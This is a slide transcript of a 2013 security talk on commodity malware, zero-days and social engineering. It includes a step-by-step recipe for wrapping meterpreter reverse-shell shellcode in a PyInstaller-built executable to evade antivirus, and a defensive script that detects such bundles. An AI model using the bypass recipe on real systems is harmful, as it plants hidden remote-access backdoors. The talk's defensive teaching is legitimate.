give me three things: anti-virus bypass made easy

Upload: security-weekly

Post on 31-Jul-2015

TRANSCRIPT

Security Weekly™ Presents: Give Me Three Things

http://securityweekly.com

Sometimes, three is bad

Brought To You By:

[email protected]

http://hacknaked.tv Copyright 2013

The Need for Focus

• It is easy to get caught up in the latest “Hack of the day”

• Let’s talk about

• iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X

• But, when we get popped, it is going to be something simple

• Cool stuff is cool, but the basics will kill you

#1 Crappy Malware

• Had enough presentations on the “Not so advanced persistent threat?”

• Somehow, the belief is that if we can make fun of the attackers' skill level, it makes us... ???

• Better? Smarter?

• Why?

• Because…..

Results Matter

About that Malware

• It tends to be well known

• It tends to have AV signatures*

• Tracing it back to a specific group can be hard

• Anyone can download it

• It is not 1337 or even 31337

Just right

Poison Ivy

Citadel

AV Bypass Made Easy

• Many of these tools have options to export to a raw string of hex characters

• In fact, that does not even matter

• We can use Ghost Writing techniques

• Simply exporting and re-importing as a script does the trick

• Flame did this with Lua

This and cookies: Why I pentest

Ghost Writing: Creating the Binary

Converting to Assembly

Editing the Assembly

Finalize the Payload

Python Injection

• Another technique is to:

• Convert your payload into Raw output

• Import the Raw output into a python script

• Convert the Python script into an executable

• It is all because the text sections of an .exe are not being reviewed by many AV vendors

• They would have to write the signature for Python itself

• Not likely

• Great write up by Mark Baggett

• http://tinyurl.com/SANS-580-Python-AV-Bypass

Windows AV Bypass - Setup

• Create a Windows box with prerequisites

• Same as target (32-bit vs. 64-bit)

• Install Python: http://www.python.org/

• Add Python to system PATH

• Install PyWin32: http://sourceforge.net/projects/pywin32/

• Install PyInstaller: http://www.pyinstaller.org/

• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip

Windows AV Bypass - Config

• Extract files from PyInjector

• Move pyinjector.py into root of PyInstaller folder

• Use msfpayload to generate alphanumeric shellcode (on any machine)

• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more

• Make sure payload matches architecture!

• Within pyinjector.py:

• replace: shellcode = sys.argv[1]

• with: shellcode = '<msfpayload output>'

• where: <msfpayload output> = output from the above msfpayload command

Windows AV Bypass - Compile

• While in the PyInstaller Directory:

• python utils\Makespec.py --onefile --noconsole pyinjector.py

• python utils\Build.py pyinjector/pyinjector.spec

• New backdoor should be under:

• [PyInstaller]/pyinjector/dist/pyinjector.exe

• Rename the executable, deploy, profit

• Don’t forget your listener!!!
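The two slides above make a defender's point: the signature-based engine is looking for the shellcode, while the thing actually sitting on disk is a PyInstaller-wrapped Python interpreter. A generic check for the wrapper is something a blue team can write without a signature for any particular payload. The script below is an added example written for this page; it is not code from the presentation, from PyInjector or from PyInstaller. It assumes the archive cookie magic that PyInstaller writes at the end of every bundle (as found in PyInstaller's own archive reader) and reads only the leading cookie fields that old and new PyInstaller releases share; `build_sample` constructs a stub "PE" with such a cookie so the check runs offline.

```python
"""Flag PE files that carry a PyInstaller archive, as a generic triage check
for Python-wrapped payloads. Added example for this page, not part of the
presentation or of the PyInjector/PyInstaller projects."""
import struct
from pathlib import Path

# Cookie magic written at the end of every PyInstaller bundle
# (PyInstaller/archive/readers.py). Detecting the packer is payload-neutral:
# it does not depend on a signature for whatever the script embeds.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# Leading cookie fields shared by old and new PyInstaller releases:
# magic, archive length, TOC offset, TOC length, Python version (e.g. 27).
# Newer releases append further fields; they are ignored here (assumption).
COOKIE_HEAD = "!8siiii"


def find_pyinstaller_cookie(data: bytes):
    """Return (offset, fields) of the PyInstaller cookie, or None."""
    off = data.rfind(PYINSTALLER_MAGIC)
    if off < 0 or off + struct.calcsize(COOKIE_HEAD) > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers = struct.unpack_from(COOKIE_HEAD, data, off)
    return off, {"pkg_len": pkg_len, "toc_off": toc_off,
                 "toc_len": toc_len, "pyvers": pyvers}


def classify(data: bytes) -> dict:
    """Triage verdict for one file image: is it a PE, does it bundle Python,
    which interpreter version, and should an analyst look at it."""
    is_pe = data[:2] == b"MZ"
    cookie = find_pyinstaller_cookie(data)
    verdict = {"pe": is_pe, "pyinstaller": cookie is not None,
               "pyvers": None, "review": False}
    if cookie is not None:
        verdict["pyvers"] = cookie[1]["pyvers"]
    # A PE that bundles a Python runtime is not malicious by itself, but on
    # hosts where no Python-built tooling is expected it deserves a look.
    verdict["review"] = is_pe and cookie is not None
    return verdict


def scan_path(path) -> dict:
    """Read a file from disk and classify it."""
    return classify(Path(path).read_bytes())


def build_sample(pyvers: int = 27, pe: bool = True) -> bytes:
    """Constructed sample: a stub PE (or ELF) with a PyInstaller-style cookie
    appended, so the check can be exercised without a real binary."""
    body = (b"MZ" if pe else b"\x7fELF") + b"\x00" * 512
    cookie = struct.pack(COOKIE_HEAD, PYINSTALLER_MAGIC, len(body), 64, 128, pyvers)
    return body + cookie


if __name__ == "__main__":
    print(classify(build_sample()))            # PE with cookie: review
    print(classify(b"MZ" + b"\x00" * 100))     # plain PE: no cookie
```

Run it against a directory of downloaded executables with `scan_path` and the `review` flag gives you a short list worth opening in a sandbox; pairing it with an application whitelisting policy, as the "Focus and Future Plans" slide recommends, means an unexpected Python-bundled binary is blocked first and investigated second.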

Or You Could Just Choose Option 15

Option 15

#2 0-day du Jour

• Yeah, another favorite for attackers

• There is always another 0-day

• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective

• Why? Because it works

• They do a lot with volume

• What is your patch success percentage?

Lessons

• Black-list AV is easy to bypass

• In fact, we had to do it with Poison Ivy last week

• Yeah, a piece of malware 5 years old

• The attackers will be exactly as advanced as they need to be

• Which is not very advanced

Focus and Future Plans

• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system

• Get away from Black List Security

• Now

• Right now

• ... I mean after this presentation

#3 Users Making “Mistakes”

• How could we have a presentation without this?

• There is no way hackers would be this successful without users

• Ha Ha!!! Users are “dumb”

• Yeah..

• Right?

• Not so fast sparky

We are all Dumb

• Or, the pretexts for the attackers are getting really, really good

• Some SE pretexts we use are not fair

• Major insurance company and a change of coverage

• LinkedIn merit badges

• If the attack is tailored, it is successful

Caller ID Spoofing

Hail Pentest Geek!

http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/

Lessons

• Users are going to make mistakes

• Not because they are dumb

• Well, half of them are below average

• Because they are not trained

• And because the attackers are good

Focus and Future Plans

• Hacker Guard Lesson: Once again, focus on attacker actions

• Limit the damage the user can do

• Implement Firewalls

• Implement Software Restriction Policies

• Implement Internet Whitelisting

• But don’t simply believe the user is stupid

• Train them: Securing the Human

Conclusions

• While bright shiny objects are bright and shiny

• We need to come back to basics and fundamentals

• We lose sight of that in this industry

OCM at Black Hat

• Offensive Countermeasures at Black Hat 2013

• http://tinyurl.com/HNTV-BH-2013

End of Line

• Hack Naked TV Episodes

• http://www.hacknaked.tv

• Watch us:

• Blip.tv: http://blip.tv/securityweekly

• YouTube: http://youtube.com/securityweeklytv

• Subscribe via iTunes:

• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2